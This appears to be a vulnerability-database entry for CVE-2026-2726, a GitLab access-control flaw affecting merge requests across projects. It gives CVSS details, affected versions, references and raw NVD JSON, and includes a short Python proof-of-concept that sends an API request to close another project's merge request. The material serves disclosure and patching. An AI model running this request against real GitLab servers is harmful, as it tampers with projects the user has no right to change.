CVE-2026-2726

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.10 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 that could have allowed an authenticated user to perform unauthorized actions on merge requests in other projects due to improper access control during cross-repository operations.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:community:*:*:* - VULNERABLE

GitLab CE/EE >= 11.10 < 18.8.7

GitLab CE/EE >= 18.9 < 18.9.3

GitLab CE/EE >= 18.10 < 18.10.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-2726 PoC Concept
# This script demonstrates how an authenticated user might attempt unauthorized actions on a merge request in another project.
# Note: This is for educational purposes and testing against authorized systems only.

TARGET_URL = "https://gitlab.example.com/api/v4/projects"
PRIVATE_TOKEN = "your_access_token"
TARGET_PROJECT_ID = "123"  # The target project ID the user does not have access to
MR_IID = "1"              # The Merge Request IID
ACTION = "close"          # The unauthorized action to perform

headers = {
    "PRIVATE-TOKEN": PRIVATE_TOKEN,
    "Content-Type": "application/json"
}

# Attempting to perform an action on a cross-project MR
# The vulnerability arises if the server fails to check access rights on TARGET_PROJECT_ID
url = f"{TARGET_URL}/{TARGET_PROJECT_ID}/merge_requests/{MR_IID}/{ACTION}"

response = requests.put(url, headers=headers)

if response.status_code == 200:
    print(f"[+] Potential Vulnerability Confirmed: Action '{ACTION}' executed successfully.")
    print(f"[+] Response: {response.json()}")
else:
    print(f"[-] Action failed or forbidden. Status Code: {response.status_code}")
    print(f"[-] Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2726
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2726
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2726/
[4] VulDB https://vuldb.com/cve/CVE-2026-2726
[5] https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/590717
[7] https://hackerone.com/reports/3543886

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2726", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:57.640", "lastModified": "2026-03-26T18:30:16.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.10 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 that could have allowed an authenticated user to perform unauthorized actions on merge requests in other projects due to improper access control during cross-repository operations."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab CE/EE que afecta a todas las versiones desde la 11.10 anterior a la 18.8.7, la 18.9 anterior a la 18.9.3, y la 18.10 anterior a la 18.10.1 que podría haber permitido a un usuario autenticado realizar acciones no autorizadas en solicitudes de fusión en otros proyectos debido a un control de acceso inadecuado durante operaciones entre repositorios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "11.10.0", "versionEndExcluding": "18.8.7", "matchCriteriaId": "9BE6F7AF-744F-47CA-B1F1-878BDF61FCD1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "11.10.0", "versionEndExcluding": "18.8.7", "matchCriteriaId": "74034C2D-481F-469C-8DD2-DAF9F254A47D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.3", "matchCriteriaId": "96F7E7EC-4C2E-4A48-8134-9262B251C89C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.3", "matchCriteriaId": "C3240349-67A3-43E2-BAD9-EFAA3E0A5D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:community:*:*:*", "matchCriteriaId": "D5B6ECC9-6AEA-4DD0-B12B-A3A7A9FE91DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "2B8DF779-B99E-4096-B734-78AB1849D136"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/590717", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3543886", "source": "[email protected]", "tags": ["Permissions Required"]}]}}